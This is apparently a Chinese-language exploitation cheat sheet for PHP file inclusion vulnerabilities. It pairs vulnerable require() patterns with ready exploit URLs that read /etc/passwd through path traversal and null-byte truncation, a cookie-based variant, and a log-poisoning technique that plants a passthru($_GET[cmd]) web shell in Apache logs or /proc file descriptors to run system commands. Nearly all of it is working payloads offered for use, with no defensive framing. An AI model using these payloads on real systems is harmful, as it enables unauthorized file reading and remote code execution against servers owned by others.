1、文件包含利用
通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.
Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd
Type of call:
require("includes/".$file);
Exploit:
http://host/?file=../../../../../etc/passwd
Type of call:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit:
http://host/?file=../../../../../etc/passwd%00
Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit:
javascript:document.cookie = "lan=../../../../../etc/passwd%00″;
2、包含命令执行
当能够把这句代码 passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。
利用方式1:将内容插入apache日志里面。
请求不存在的页面:http://host/xxxxxxx= passthru($_GET[cmd]) ?>
然后按照前面的方式请求:
http://host/?file=../../../var/apache/error_log&cmd=ls /etc
http://host/?file=../../../var/apache/error_log&cmd=uname -a
如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
pepelux:~$ perl proc.pl http://host/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2
得到PID 和 FD_ID后就可以这么构造。
http://host/?file=/proc/4191/fd/2&cmd=uname -a
http://host/index.php?x= passthru($_GET[cmd]) ?>